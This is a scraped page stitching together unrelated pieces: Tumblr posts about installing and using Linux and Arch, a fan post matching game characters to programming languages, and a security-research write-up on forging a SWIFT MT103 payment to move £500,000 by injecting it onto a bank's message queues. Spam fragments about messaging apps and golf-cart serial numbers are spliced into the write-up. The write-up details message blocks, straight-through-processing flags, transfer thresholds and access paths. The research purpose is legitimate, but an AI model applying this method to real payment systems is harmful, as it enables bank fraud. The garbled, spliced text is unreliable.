However, I did manage to get a dock in the form of Latte Dock and it does work fine.
However Steam doesn’t like Wayland it works but man is slow and problematic so at this time I still have the system boot into X11 and change up to Wayland should I need it.
So where do I go with this new Dell laptop so far it has performed more than adequately. Also, EndeavourOS once again proves to be my preferred Linux flavour and I won’t be going back to a stable (Debian, Mint, Ubuntu) environment anytime soon unless forced.
Well, that’s a wrap for the moment… In turn, I will probably install MAME and maybe play with QEMU but that’s for the next episode should I get around to it.
Until next time… Take care.
1 note
·
View note
Text
(you might know some of this already, but I'm going in detail because it's not often I get to info-dump this to someone)
What linux is:
Linux is a free and open source operating system kernel -in itself it isn't a full Os, it needs other parts; if you want I can explain what a kernel is/does- made by Linus Torvalds in 1991 based on the Minix Os, which was based on the Berkley Software Distribution version of Unix. Although linux isn't a full Os, people will generally refer to any Os that uses the linux kernel as "linux"
Since then it has become a major corner stone of the internet. ~90% of servers online are running some kind of linux. Although online surveys show that only 3-5% of people use linux as a desktop Os.
because linux is free and open source -meaning anyone can download or edit the source code- there are several distributors (or distro's) to download a version of linux, each with different package managers (a place to download new software), desktop environments (which determines what apps you have installed and how your desktop looks), and other stuff.Some linux distro's are based on others and they may have some things in common. For example: all distro's based on Debian use Debian's "apt" package manager.
Because all linux distro's are based on the same kernel (it's not often that distro's mod the kernel for various reasons) most (not all) software is compatible between distro's with a little finagling.
How to install linux:
installing linux may very from computer to computer, and on some computers it is nearly impossible; although in theory anything with 512 mb of ram could run linux. But a lot of these details may be different on your computer, so look into that first.
find a distro you want to use. Some distro's I'd advise staying away from if you are a beginner, like Arch. There are tons of distro's out there so it may seem like a daunting task, but here are a good few recommendations for beginners. Linux Mint is a good place to start, it's basically the beginner distro. it's simple, works with most computers, and suites just about anyone, from long time users to beginners, to shitty little cousins. Pop_OS! is another good one I've seen recommended, I've never used it personally but I've heard good things. For a long time Ubuntu (mint's daddy in a sort of way) was considered one of the best general distro's, but in recent years it has kind of fallen off, but still, it's good to keep in mind as a backup if something goes wrong.
make a bootable usb thumdrive. to do this you have to download the iso of the OS you are going to use and use a flashing software to make the usb bootable. Don't just put the iso on a thumb drive like what I did when I first installed installed linux, make sure you are using a flashing software. Rufus is a good flashing sofware for Windows (assuming that is what you're using). here is a good article on how to make a bootable usb
go into a one time boot/bios. the next thing you need to do is boot your computer from the usb. which can be done by rearranging the boot order in the bios, or running a one time boot on your computer. this is where things start to change depending on your computer. for most computers if you reboot you will see a little screen flash that may have some technical info and say something like "[key] for bios/uefi setup [key] for one-time boot launch." On my computer those keys are f2 and f12 respectively, but it may be different on yours. Some computers *ahem chromebook* may not give you access to the bios or one time boot. Here is a guide on common ways on how to boot into bios/one time boot. although I recommend looking up your laptop model/mother board model for specific details.
boot from the usb. now that you are in the bios/boot utility you need to boot into the usb. when booted into the usb, most distro's will allow you to test how performance is on your computer, test the desktop environment, and make sure you have all your drivers and other things worked out so you have access to wifi and bluetooth and stuff.
run the installer. on the desktop there should be an installer application that you can run, most of them are pretty simple; they will just ask you stuff like usernames, times zones, pre-installed apps, etc. etc. WARNING: installing linux will wipe your drive clean, anything you had will be gone. Make sure you have backups of anything that may be important.
reboot your computer & unplug the usb; after you run the installer linux should be on your computer now
many distro's have installation guides on their websites if you want to follow those.
if you want to install linux on a chromebook it is possible (my first laptop was a chromebook and I installed Solus on it, it was my first distro and a big regret; nothing aginst Solus, I just didn't like it). here are some resousrces if you want to do that: [1] [2] [3]
How to use linux:
one of the big corner stones of linux is the terminal. due to its development history the terminal is the dominate way to interact with your computer. a lot of distro's may have a way to do things with a gui, but you will always have a terminal, so you best be used to it.
this is what a terminal emulator looks like. Terminals are technically a part of the hardware (and can be found under /dev/tty* in linux), but you can access them from the desktop through the emulator.
on the terminal you will be greeted to a command prompt, from here you can type out different commands. when you type a command the shell (the software that the terminal uses to communicate with the OS) will search through the $PATH variable and check every folder it points to, and if the command you type is found then it will run the command with what ever parameters you give.
commands follow a formula: CommandName parameter1 parameter2 ...
some commands wont have any parameters, others will, it all depends on the command. But here are some common commands to help you understand
before you begin, just know that "~" refers to your home folder; directory is just a fancy term for folders (that is due to the history of computers); "." refers to the directory you are currently in, and ".." refers to the directory about you.
ls (list): lists the contents of whatever folder you're in
pwd (print working directory): prints the file path to your fold (ex: /home/uppereepy/Documents)
cd (change directory): lets you change which folder you're in (ex cd ..)
cat (concatenate): concatenates (prints) files to the screen
mv (move): move files to new locations (ex: mv HelloWorld.txt ~/Desktop), can also be used to rename files (ex: mv HelloWorld.txt Hello.txt)
man (manual): if you don't know what a command does then you can use the man command to look up what a command does (ex: man ls).
some advice: you will grow to understand the terminal in time, and although tutorials will help, using the terminal will help you understand things a lot more. manual entries, when you first start, may seem esoteric and hard to read, so just know it is ok to look up what a command does on the internet. learning the C programing language can really help you understand the terminal, and so does reading about the history of computers or using older computers
Resources to get started:
Wikipedia page for linux computer terminals The GNU project (where took off) top 50 commands how to use pipes online manual linux for beginners yt linux for hackers by network chuck (he is a little annoying, but he's how I got started)
and if you want to get into the history of computers I'd suggest looking into The 8-bit Guy on yt and Unix: a History and a Memoir by Brian Kernighan (one of the developers behind Unix and wrote "The C Programming Language")
anyways, that's all I got, I am tired (it is nearly 12:00 am while I am writing this), sorry for the extremely long post
gee i really want to get into linux but idk how to even start.. I wonder if there are any smart transgender women out there who could explain it to me in extreme detail while i bat my eyes at them.....
#long post#linux#linuxposting#really long post#linux mint#Pop_OS!#linux for beginners#information#infodump
606 notes
·
View notes
Text
I use Arch, BTW
I made the switch from Ubuntu 23.04 to Arch Linux. I embraced the meme. After over a decade since my last failed attempt at daily driving Arch, I'm gonna put this as bluntly as I can possibly make it:
Arch is a solid Linux distribution, but some assembly is required.
But why?
Hear me out here Debian and Fedora family enjoyers. I have long had the Debian family as my go-to distros and also swallowed the RHEL pill and switched my server over to Rocky Linux from Ubuntu LTS. on another machine. More on that in a later post when I'm more acclimated with that. But for my personal primary laptop, a Dell Latitude 5580, after being continually frustrated with Canonical's decision to move commonly used applications, particularly the web browsers, exclusively to Snap packages and the additional overhead and just weird issues that came with those being containerized instead of just running on the bare metal was ultimately my reason for switching. Now I understand the reason for this move from deb repo to Snap, but the way Snap implements these kinds of things just leaves a sour taste in my mouth, especially compared to its alternative from the Fedora family, Flatpak. So for what I needed and wanted, something up to date and with good support and documentation that I didn't have to deal with 1 particular vendors bullshit, I really only had 2 options: Arch and Gentoo (Fedora is currently dealing with some H264 licensing issues and quite honestly I didn't want to bother with that for 2 machines).
Arch and Gentoo are very much the same but different. And ultimately Arch won over the 4chan /g/ shitpost that has become Gentoo Linux. So why Arch? Quite honestly, time. Arch has massive repositories of both Arch team maintained and community software, the majority of what I need already packaged in binary form. Gentoo is much the same way, minus the precompiled binary aspect as the Portage package manager downloads source code packages and compiles things on the fly specifically for your hardware. While yes this can make things perform better than precompiled binaries, the reality is the difference is negligible at best and placebo at worst depending on your compiler settings. I can take a weekend to install everything and do the fine tuning but if half or more of that time is just waiting for packages to compile, no thanks. That plus the massive resource that is the Arch User Repository (AUR), Arch was a no-brainer, and Vanilla arch was probably the best way to go. It's a Lego set vs 3D printer files and a list of hardware to order from McMaster-Carr to screw it together, metaphorically speaking.
So what's the Arch experience like then?
As I said in the intro, some assembly is required. To start, the installer image you typically download is incredibly barebones. All you get is a simple bash shell as the root user in the live USB/CD environment. From there we need to do 2 things, 1) get the thing online, the nmcli command came in help here as this is on a laptop and I primarily use it wirelessly, and 2) run the archinstall script. At the time I downloaded my Arch installer, archinstall was broken on the base image but you can update it with a quick pacman -S archinstall once you have it online. Arch install does pretty much all the heavy lifting for you, all the primary options you can choose: Desktop environment/window manager, boot loader, audio system, language options, the whole works. I chose Gnome, GRUB bootloader, Pipewire audio system, and EN-US for just about everything. Even then, it's a minimal installation once you do have.
Post-install experience is straightforward, albeit just repetitive. Right off the archinstall script what you get is relatively barebones, a lot more barebones than I was used to with Ubuntu and Debian Linux. I seemingly constantly was missing one thing for another, checking the wiki, checking the AUR, asking friends who had been using arch for even longer than I ever have how to address dumb issues. Going back to the Lego set analogy, archinstall is just the first bag of a larger set. It is the foundation for which you can make it your own further. Everything after that point is the second and onward parts bags, all of the additional media codecs, supporting applications, visual tweaks like a boot animation instead of text mode verbose boot, and things that most distributions such as Ubuntu or Fedora have off the rip, you have to add on yourself. This isn't entirely a bad thing though, as at the end if you're left with what you need and at most very little of what you don't. Keep going through the motions, one application at a time, pulling from the standard pacman repos, AUR, and Flatpak, and eventually you'll have a full fledged desktop with all your usual odds and ends.
And at the end of all of that, what you're left with is any other Linux distro. I admit previously I wrote Arch off as super unstable and only for the diehard masochists after my last attempt at running Arch when I was a teenager went sideways, but daily driving it on my personal Dell Latitude for the last few months has legitimately been far better than any recent experiences I've had with Ubuntu now. I get it. I get why people use this, why people daily drive this on their work or gaming machines, why people swear off other distros in favor of Arch as their go to Linux distribution. It is only what you want it to be. That said, I will not be switching to Arch any time soon on mission critical systems or devices that will have a high run time with very specific purposes in mind, things like servers or my Raspberry Pi's will get some flavor of RHEL or Debian stable still, and since Arch is one of the most bleeding edge distros, I know my chance of breakage is non zero. But so far the seas have been smooth sailing, and I hope to daily this for many more months to come.
39 notes
·
View notes
Note
I've seen a couple people talk about Linux. Is it worth it for someone who basically uses their laptop like an app machine? I play don't starve together, I have firefox, and I write, aaannnnnd that's about it. It slows down sometimes when I'm playing different games but I always thought that was what I get for not having the space, or the desk, for a desktop.
Oh, you are actually the ideal candidate.
If you primarily use your computer for web browsing, media consumption, office work and/or steam games, you are THE target audience for Linux desktop OSes.
The only people who I wouldn't recommend make the jump are people who do very specialized art, like 3D modelling and animation from scratch (blender works on linux but little else in that field), and people who do high end or competitive gaming without the use of steam.
I keep specifying steam, because the steam launcher has a bunch of whateverthefuck going on that makes it basically trivial to run steam supported games on linux. They even provide the setting for it inside the linux version of Steam, called "proton compatibilty layer." Which is very roughly versions of all the files that a game would normally be able to call from the windows OS, only with linux information in this. So there's very little impact on hardware performance.
There can even be improvements in performance because the actual operating system is so lightweight that there are more hardware resources available to the game.
Personally, I find that the thing that is the most improved in terms of response is actually Firefox. On Windows, launchingfirefox always took me upwards of 10 seconds. Once open, it worked like a dream, but for whatever reason Window shated actually opening the program for me.
On linux, it's instant. If there's a loading speed, it's too short for me to notice in the time it takes to move my eyes from the firefox option in the start menu, to the center of the screen where the window actually opens.
Plus, and this is something I LOVE for using linux as an "app machine," the linux software manager actually works. If you've ever use an app store on your phone, a software manager is basically the same function. You isntall programs from it, and then it updates and secures them automatically for you.
Compare that to windows, where most programs need to be downloaded as .exe files from the developer, then installed manually by you, then either you check for updates on the website manually or the program checks automatically whenever it opens, and then you have to download a whole other fucking exe file to run the update.
None of that bullshit.
You install it in the software manager and then any time your computer runs system updates, it will also update all the software.
Fucking magnificent. I live for that shit. In fact, it's such an integral feature and so much better from a use perspective that windows tried to re=create it with the windows store. Only their version sucks ass and has like no fucking useful programs. So then windows users tried to re-create it with a system called Chocolate Software Management For WIndows . And, credit where it is due, if a program has choco support it does work beautifully!
It's just that very few programs do.
Meanwhile, back on linux, they even introduced a feature called flatpacking that allows people who make programs to basically just.... pops it into the software store, so even weird shit like the specific game mod for FFXIV that I personally use has its own software manager entry.
Anyway, okay, TLDR:
You are literally, almost as if divinely crafted, the ideal kind of user for switching to Linux.
I like Linux Mint in XFCE, but many people swear that Ubuntu is the place to start. Which one I recommend to you would come down to whether you prefer the "feel" and "look" of older windows like XP and 7, or MacOS and newer Windows like 11. For the older style, do Mint. For the newer, try Ubuntu.
#I really have just become a Linux Guy haven't I#Linux Mint#XFCE#Ubuntu#Lubuntu#Kubuntu#(Those are different types of Ubuntu)#Linux#God help me#Also to the people reading this and thinking THAT IS NOT WHAT A FLATPAK IS!!!!#or THAT IS NOT HOW CHOCO UPDATER WORKS#Or whatever else#Please understand that I am hypersimplifying because???? NONE OF THAT IS RELEVENT
70 notes
·
View notes
Text
NXX Members with Coding Languages I Think They Would Enjoy
In which I use some of my vague knowledge for entertainment purposes :D
WC: 0.7K
MC/Rosa: the building blocks in Scratch
Whatever MC does, she gives it her all and coding is no exception!
I'm thinking she'll likely start small and build from there (pun unintended), and that she'll probably take a lot of enjoyment from the puzzle-shaped pieces in Scratch
She's learning the foundation to writing programs!
Soon she will be able to master every language and become an expert in all things programming
Luke: Command line / Python
Command line isn't exactly a coding language per se, but if Luke did have a favorite language, I think it'd be Python (although I think he can comfortably code in multiple languages since he can easily hack into the Big Data Lab!)
I'm saying Python slightly because I'm biased, but also because Python offers syntax that is easy to read and is also fairly simple to write -- because of said less complicated syntax
Also, snek! A young Luke sees that the language is named after a Cool Reptile and says, "yeah I'm gonna go learn that right now"
Moving on to the Not A Coding Language: Command line (could be Windows, Linux, whatever they have in Stellis)
Luke is the kind of person who likes taking things apart, building them back together again, but it's not the same as before oh no you'll find that your toaster is not an ordinary toaster anymore, it also triples as an inkjet printer and a metal detector!
With any kind of command line interface he's allowed to go crazy with an electronic device! He used to have a cheat sheet of all the commands next to him but NOT ANYMORE, he's memorized them after hours of playing around with them (and if he forgets anything, there's probably a command along the line of /help that he can type in to get the information he's looking for)
Artem: CoffeeScript
While Artem likes JavaScript well enough, he enjoys the simplicity of CoffeeScript
Because CoffeeScript is essentially just Javascript with nicer syntax (or as the CoffeeScript website puts it, "an attempt to expose the good parts of JavaScript in a simple way.")
Also, it has coffee in the name and while he's not going to admit it, it's hard to resist (and coffee is pretty on brand for him)
If Artem is in the mood for curly brackets, he can switch to JavaScript fairly easily, but he's very comfortable with CoffeeScript, even if it does raise eyebrows at times due to its status as a lesser known language
"CoffeeScript?" Celestine asks. "Is that a real thing?"
"Yes," Artem says, and quotes the CoffeeScript website: "It's just Javascript."
Vyn: C or C++
Because Vyn is insane
That's it. That's my reasoning
I think other than C or C++, Vyn might like SQL? That's the database language for managing/sorting data and who knows? He might like that. Might find it relaxing, even
But back to C!
Vyn falls in love with C by first going through the full experience of pain: the missing semicolons, the dropped bracket, each and every skipped indentation
But C can be used for loads of things, I mean it's been around for approximately 50 years and heaps of things are coded in C
And Vyn knows, that when he's mastered it
He will be unstoppable
Marius: LOLCODE
I have been waiting for the day I can finally bring up this coding language, and today is that day!
Because tell me Marius von Hagen would not have the utmost pleasure beginning programs with HAI and ending them with KTHXBYE
Tell me he wouldn't enjoy loops that are essentially written as IM IN YR LOOP and IM OUTTA YR LOOP (rather than the conventional phrasing for while and for loops)
While I don't have enough knowledge to write in LOLCODE, I still find it hilarious and I think Marius would have a blast just playing around with the commands
Other than LOLCODE, I think Marius would like CSS (and maybe even HTML, they go hand in hand)! It can be a pain sometimes but the possibilities are next to endless (making things pretty with computer language? Seems like it could be right up his alley)
Side note on Vyn and C/C++: I have the utmost respect for people who can write in C, because I have struggled with it -- although honestly maybe that's because I don't spend enough time learning it (and because Python 3 is my favorite haha)
Edit: to all the people in the tags who said Luke would like Java, yes you are completely right I just know next to nothing about Java :')
#tears of themis#let me be a nerd for a quick second#yes I am indeed talking about programming languages today#sam wherever you are I think you might enjoy this#luke pearce#artem wing#vyn richter#marius von hagen#mc | rosa
85 notes
·
View notes
Text
5m Mathmrs. Mac's Messages

TLDR: With a bit of research and support we were able to demonstrate a proof of concept for introducing a fraudulent payment message to move £0.5M from one account to another, by manually forging a raw SWIFT MT103 message, and leveraging specific system trust relationships to do the hard work for us!
5m Mathmrs. Mac's Messages App
5m Mathmrs. Mac's Messages Message
5m Mathmrs. Mac's Messages To My
5m Mathmrs. Mac's Messages For Her
Before we begin: This research is based on work we performed in close-collaboration with one of our clients; however, the systems, architecture, and payment-related details have been generalized / redacted / modified as to not disclose information specific to their environment.
A desktop application for Instagram direct messages. Download for Windows, Mac and Linux.
Have a question, comment, or need assistance? Send us a message or call (630) 833-0300. Will call available at our Chicago location Mon-Fri 7:00am–6:00pm and Sat 7:00am–2:00pm.
5m Mathmrs. Mac's Messages App
With that said.. *clears throat*
The typical Tactics, Techniques and Procedures (TTPs) against SWIFT systems we see in reports and the media are - for the most part - the following:
Compromise the institution's network;
Move laterally towards critical payment systems;
Compromise multiple SWIFT Payment Operator (PO) credentials;
Access the institution's SWIFT Messaging Interface (MI);
Keys in - and then authorize - payment messages using the compromised PO accounts on the MI.
This attack-path requires the compromise of multiple users, multiple systems, an understanding of how to use the target application, bypass of 2FA, attempts to hide access logs, avoid alerting the legitimate operators, attempts to disrupt physical evidence, bespoke malware, etc. – so, quite involved and difficult. Now that’s all good and fine, but having reviewed a few different payment system architectures over the years, I can’t help but wonder:
“Can't an attacker just target the system at a lower level? Why not target the Message Queues directly? Can it be done?”
A hash-based MAC might simply be too big. On the other hand, hash-based MACs, because they are larger, are less likely to have clashes for a given size of message. A MAC that is too small might turn out to be useless, as a variety of easy-to-generate messages might compute to the same MAC value, resulting in a collision. WhatsApp Messenger is a FREE messaging app available for iPhone and other smartphones. WhatsApp uses your phone's Internet connection (4G/3G/2G/EDGE or Wi-Fi, as available) to let you message and call friends and family. Switch from SMS to WhatsApp to send and receive messages, calls, photos, videos, documents, and Voice Messages. WHY USE WHATSAPP. Garrick Hello, I'm Garrick Chow, and welcome to this course on computer literacy for the Mac. This course is aimed at the complete computer novice, so if you're the sort of person who feels some mild anxiety, nervousness, or even dread every time you sit down in front of your computer, this course is for you.
Well, let's find out! My mission begins!
So, first things first! I needed to fully understand the specific “section” of the target institution's payment landscape I was going to focus on for this research. In this narrative, there will be a system called “Payment System” (SYS). This system is part of the institution's back-office payment landscape, receiving data in a custom format and output's an initial payment instructions in ISO 15022 / RJE / SWIFT MT format. The reason I sought this scenario was specifically because I wanted to focus on attempting to forge an MT103 payment message - that is:
In this video I will show you where to locate the serial number on a Western golf cart. Ebay Store: Please SUBSCRIBE. Western golf cart serial number lookuplastevil.
MT – “Message Type” Literal;
1 – Category 1 (Customer Payments and Cheques);
0 – Group 0 (Financial Institution Transfer);
3 – Type 3 (Notification);
All together this is classified as the MT103 “Single Customer Credit Transfer”.
Message type aside, what does this payment flow look like at a high level? Well I’ve only gone and made a fancy diagram for this!
Overall this is a very typical and generic architecture design. However, let me roughly break down what this does:
The Payment System (SYS) ingests data in a custom - or alternative - message format from it's respective upstream systems. SYS then outputs an initial payment instruction in SWIFT MT format;
SYS sends this initial message downstream to a shared middelware (MID) component, which converts (if necessary) the received message into the modern MT format understood by SWIFT - Essentially a message broker used by a range of upstream payment systems within the institution;
MID forwards the message in it's new format on to the institution's Messaging Interface (let's say its SAA in this instance) for processing;
Once received by SAA, the message content is read by the institution's sanction screening / Anti-money laundering systems (SANCT).
Given no issues are found, the message is sent on to the institution's Communication Interface (SWIFT Alliance Gateway), where it's then signed and routed to the recipient institution over SWIFTNet.
OK, so now I have a general understanding of what I'm up against. But if I wanted to exploit the relationships between these systems to introduce a fraudulent payment without targeting any payment operators, I was going to need to dig deeper and understand the fundamental technologies in use!
So how are these messages actually 'passed' between each system? I need to know exactly what this looks like and how its done!
More often than not, Message Queues (MQ) are heavily used to pass messages between components in a large payment system. However, there are also various “Adapter” that may be used between systems communicating directly with the SAG (Such as SAA or other bespoke/3rd party systems). These are typically the:
Remote API Host Adapter (RAHA);
MQ Host Adapter (MQHA);
Web Services Host Adapter (WSHA).
Having identified that MQ was in use, my initial assumption was that there was most likely a dedicated Queue Manager (QM) server somewhere hosting various queues that systems push and pull messages from? However, due to SWIFT CSP requirements, this would most likely - at a minimum - take the form of two Queue Managers. One which manages the queues within the SWIFT Secure Zone, and another that manages queues for the general corporate network and back office systems.
Let's update that diagram to track / represent this understanding: Now I could research how this 'messaging' worked!
There are multiple ways to configure Message Queues architectures, in this case there were various dedicated input and output queues for each system, and the message flow looks something like this: Full disclosure, turns out it’s hard to draw an accurate - yet simple - MQ flow diagram (that one was basically my 4th attempt). So it’s.. accurate 'enough' for what we needed to remember!
5m Mathmrs. Mac's Messages Message
Now I had a good understanding of how it all worked, it is time to define my goal: 'Place a payment message directly on to a queue, and have it successfully processed by all downstream systems'.
This sounds simple, just write a message to a queue, right? But there are a few complications!
Why are there few indications of this attack vector in the wild?
How do I even gain “write” access to the right queue?
What protects the message on the queues?
What protects the messages in transit?
What format are the messages in?
What is the correct syntax for that message format at any particular queue (0 margin for error)?
Where does PKI come in? How / where / when are the messages signed?
Can I somehow get around the message signing?
What values in the messages are dependent / controlled / defined by the system processing them (out of my control)?
What is the maximum amount I can transfer using Straight Through Processing, without alerting the institution / requiring manual validation?
But OK, there's no point dwelling on all of that right now, I'll just clearly define what I want to do! The goal:
Successfully write a payment instruction for 500,000 GBP;
Inject that message directly onto a specific queue;
Have the message pass environment-specific validation rules;
Have the message pass sanctions and AML checks.
Have the message successfully signed;
Have the message pass SWIFTNet-specific validation rules;
What I was not interested in doing for this research - yet needed to understand nevertheless for a full attack chain was:
How to compromise the institution's network;
How to gain access to the MQ admin's workstation;
How to obtain the pre-requisite credentials.
What I wanted to 100% avoid at all costs:
The attack involving SWIFT payment operators in any way;
The attack involving SWIFT application access in any way;
A need to compromise signing keys / HSMs;
A need to compromise SWIFTNet operator accounts or certificates or any type of PKI;.
Now I had an idea of what to do, I needed to make sure I could write a raw MT103 payment instruction! Typically, even when operators write payment messages using a messaging interface application like Alliance Access, they only really write the message “body” via a nice GUI. As raw data this could look something like:
I'll break this down in the following table:
NameFieldValueTransaction Reference20TRANSACTIONRF103Bank Operation Code23BCRED (Message is to 'credit' some beneficiary)Value Date / Currency / Amount32A200102 (02/01/2020) GBP 500,000.00Currency / Original Credit Amount33BGBP 500000,00 (£500,000.00)Ordering Customer50KGB22EBNK88227712345678 (IBAN) JOHN DOE (Name) JOHN'S BUSINESS LTD (Line 1) 21 JOHN STREET, LONDON, GB (Line 2)Beneficiary59KFR20FBNK88332287654321 (IBAN) ALICE SMITH (Name) ALICE'S COMPANY (Line 1) 10 ALICE STREET, PARIS, FR (Line 2)Remittance Information7012345-67890 (essentially a payment reference)Details of Charge71ASHA (Shared charge between sender and receiver)
Now as this is a valid message body, if I were targeting a payment operator on SWIFT Alliance Access, I could - for the 'most' part - simply paste the message into SAA's raw message creation interface and I'd be pretty much done. With the exception of adding the sender / recipient BIC codes and most likely selecting a business unit. However, these values are not stored in the message body. Not stored in the message body you say? Well that complicates things! Where are they stored exactly?
The message “body” is referred to as “block 4” (aka the “Text Block”) within the SWIFT MT standard. As suggested by the name, there is probably also a block 1-3. This is correct; and these blocks are typically generated by the payment processing applications - such as SWIFT Alliance Access - and not necessarily input by the operators. A 'complete' MT103 message consists of 6 blocks:

Block 1 – Basic Header
Block 2 – Application Header
Block 3 – User Header
Block 4 – Text Block
Block 5 – Trailer
Block 6 – System block
So it looked like I was going to need to learn how to craft these various “blocks” from scratch.
Block 1 (Basic header)
Reading through some documentation, I crafted the following “Basic header” block:
A breakdown of what this translates too is as follows:
NameValueContextBasic Header Flag1Block 1 (Not 2, 3, 4, or 5)Application TypeFFIN ApplicationMessage Type0101 = FIN (I.e not ACK/NACK)Sender BICEBNKGB20EBNK (Bank Code) GB (Country Code) 20 (Location Code)Sender Logical TerminalATypically A, unless they are a significantly large institution and require multiple terminalsSender BranchXXXAll X if no branch neededSession Number0000The session number for the messageSequence Number 999999The sequence number of the message
Taking a step back, I already identified two potential problems: the “session” and “sequence” numbers! These are described as follows:
Session Number – Must also equal the current application session number of the application entity that receives the input message.
Sequence number – The sequence number must be equal to the next expected number.
Hmmm, at this point I was not sure how I could predetermine a valid session and/or sequence number - considering they seemed to be application and 'traffic' specific? But there was nothing I could do at the time, so I noted it down in a list of 'issues/blockers' to come back to later.
Block 2 (Application Header)
A bit more dry reading later, I managed to also throw together an application header:
Again, I’ve broken this down so it makes sense (if it didn’t already; I’m not one to assume):
NameValueContextApplication Header Flag2Block 2I/O IdentifierIInput Message (a message being sent)Message Type103103 = Single Customer Credit TransactionRecipient BICFBNKFR20FBNK (Bank Code) FR (Country Code) 20 (Location Code)Recipient Logical TerminalXAll General Purpose Application Messages must use 'X'Recipient BranchXXXAll General Purpose Application Messages must use 'XXX'Message PriorityNNormal (Not Urgent)
Awesome! No issues crafting this header!
Note: At this point I should probably mention that these BIC codes are not 'real', however are accurate in terms of in format and length.
Block 3 (User Header)
The third block is called the “User Header” block, which can be used to define some “special” processing rules. By leverage this header, I could specify that the message should be processed using “Straight Through Processing” (STP) rules which essentially attempts to ensure that the message is processed end-to-end without human intervention. This could be specified as follows:
However, this was not yet a valid header! As of November 2018 the user header requires a mandatory “Unique end-to-end transaction reference” (UETR) value, which was introduced as part of SWIFT's Global Payments Innovation initiative (gpi)! This is a Globally Unique Identifier (GUID) compliant with the 4th version of the generation algorithm used by the IETF standard 'RFC4122'. This consists of 32 hexadecimal characters, divided into 5 parts by hyphens as follows:
where:
x – any lowercase hexadecimal character;
4 – fixed value;
y – either: 8, 9, a, b.
This value can be generated using Python as seen below:
With an acceptable UETR generated, this is how the third block looked:
And as before, a breakdown can be found below:
NameValueContextUser Header Flag3Block 3Validation Flag119Indicates whether FIN must perform any type of special validationValidation FieldSTPRequests the FIN system to validate the message according to the straight through processing principlesUETR Field121Indicates the Unique end-to-end transaction reference valueUETR Value8b1b42b5-669f-46ff-b2f2-c21f99788834Unique end-to-end transaction reference used to track payment instruction
Block 5 and 6 (Trailer and System Blocks)
I’ve already discussed “block 4” (the message body), so to wrap this section up, I'll be looking at the final 2 blocks: Block 5, aka the “Trailer”; and block S, aka the “System” block.
Before going forward, let me take a moment to explain the pointlessly complicated concept of input and output messages:
An “input” message (I) is a message which is traveling “outbound” from the institution. So this is a message being “input” by an operator and sent by the institution to another institution.
An “output” message (O) is a message which is traveling “inbound” to the institution. So this is a message being “output” by SWIFTNet and being received by the institution.
OK, moving swiftly (aaaahhhhh!) on.
For Input messages, these blocks were not too much of a problem. The headers only really seemed to be used to flag whether the message was for training / testing or to flag if it was a possible duplicate, which syntactically took the following form:
Where “TNG” indicated “training” and “SPD” indicated “possible duplicate”.
However, with Output messages, it got considerably more complicated. An example of what the trailer and system block could look like on an Output message is the following:
A breakdown of these various values is:
Trailer ((5:) MAC – Message Authentication Code calculated based on the entire contents of the message using a key that has been exchanged with the destination bank and a secret algorithm; CHK – This is a PKI checksum of the message body, used to ensure the message has not been corrupted in transit; TNG – A flag to indicate that the message is a Testing and Training Message.
System ((S:) SPD – Possible Duplicate Flag SAC – Successfully Authenticated and Authorized Flag. This is only present if:
Signature verification was successful.
RMA (Relationship Management Application) authorization and verification was successful.
COP – Flag indicating that this is the primary message copy; MDG – The HMAC256 of the message using LAU keys.
However, these seemed to only be values I would need to consider if I was to try and forge an “incoming” message from SWIFTNet or an 'outbound' message on the output of the SAG.
So.. I'll stick with crafting an “input' message trailer:
Now, having said all that, it turned out the trailer block did seem to sometimes hold a MAC code and a message checksum (sigh), meaning I actually needed to construct something like:
So that was +2 to my 'issues/blockers' list. However, issues aside, I now understood the complete message format, and could put it all together and save the following as a draft / template MT103 message:
Highlighted in bold above are the areas of the message I was - at this point - unable to pre-determine. Nevertheless, a summary of what that the message describes is:
Using the transaction reference “TRANSACTIONRF103”;
please transfer 500,000.00 GBP;
from John Doe, (IBAN: GB22EBNK88227712345678) at “English Bank” (BIC: EBNKGB20);
to Alice Smith (IBAN: FR20FBNK88332287654321) at “French Bank” (BIC: FBNKFR20);
Furthermore, please ensure the transaction charge is shared between the two institutions;
and mark the payment with a reference of “12345-67890”.
To wrap up this section, i wanted to take a moment to explain some logic behind the target of 500,000 GBP, as it is also important.
Aside from the many reasons it would be better to transfer (even) smaller amounts (which is an increasingly common tactic deployed by modern threat actors), why not go higher? This is where it’s important to understand the system and environment you are targeting.
In this instance, let's assume that by doing recon for a while I gathered the understanding that:
If a message comes from SYS which is over £500k;
even if it has been subject to a 4 eye check;
and even if it is flagged for STP processing;
route it to a verification queue and hold it for manual verification.
This was because a transaction over £500k was determined to be “abnormal” for SYS. As such, if my transaction was greater, the message would not propagate through all systems automatically.
OK, so now that I understood:
how the system worked;
how it communicated;
the fundamental structure of a raw MT103 payment messages;
and how much I could reliably (attempt) to transfer.
And with that, it was time to take a break from MT standards and establish an understanding of how I would even get into a position to put this into practice!
To place a message on a queue, I was going to need two things:
Access to the correct queue manager;
Write access to the correct queues.
Depending on the environment and organisation, access to queue managers could be quite different and complex. However a bare-bones setup may take the following form:
An MQ Administrator accesses their dedicated workstation using AD credentials;
They then remotely access a dedicated jump server via RDP which only their host is whitelisted to access;
This may be required as the queues may make use of Channel Authentication Records, authorizing specific systems and user accounts access to specific queues;
The channels may further be protected by MQ Message Encryption (MQME) which encrypts messages at rest based on specific channels. As such, even if someone was a “super duper master admin” they would only be able to read / write to queues specifically allocated to them within the MQME configuration file (potential target for another time?);
The MQ Admin can then use tools such via the Jump Server to read/write to their desired message queues.
So, in this scenario, to gain access to the message queues I - as an attacker - would need to compromise the MQ admin’s AD account and workstations, then use this to gain access to the jump host, from where I could then access the message queues given I knew the correct channel name and was configured with authorization to access it.. and maybe throw some MFA in there..
That is understandably a significant requirement! However, when discussion sophisticated attacks against Financial Market Infrastructure (FMI), it is more than reasonable to accept that an Advanced Persistent Threat (APT) would see this as a feasible objective - We don't need to dig into the history of how sophisticated attacks targeting SWIFT systems can be.
Next, it was time to finally identify a feasible attack vector for message forgery.
Now with an idea of how to gain the right access, as well as an understanding of the various technologies and security controls in place; I update my diagram:
You may have noticed I've added something called “LAU” around the SAA-to-SAG adapter, and another “LAU” to the MID-to-SAA MQ channels, which I have yet to explain. “Local Authentication” (LAU) is a security control implemented by SWIFT to authenticate messages using a pair of shared keys between two systems. These keys are combined and used to generate a SHA256 HMAC of the message and append it to the S block. This can then be validated by the recipient system. Effectively, this validates the origin and authenticity of a message. As such, even if an attacker was in position to introduce a fraudulent payment, they'd first need to compromise both the left and the right LAU signing keys, generate the correct HMAC, and append it to the message in order to have it accepted / processed successfully.
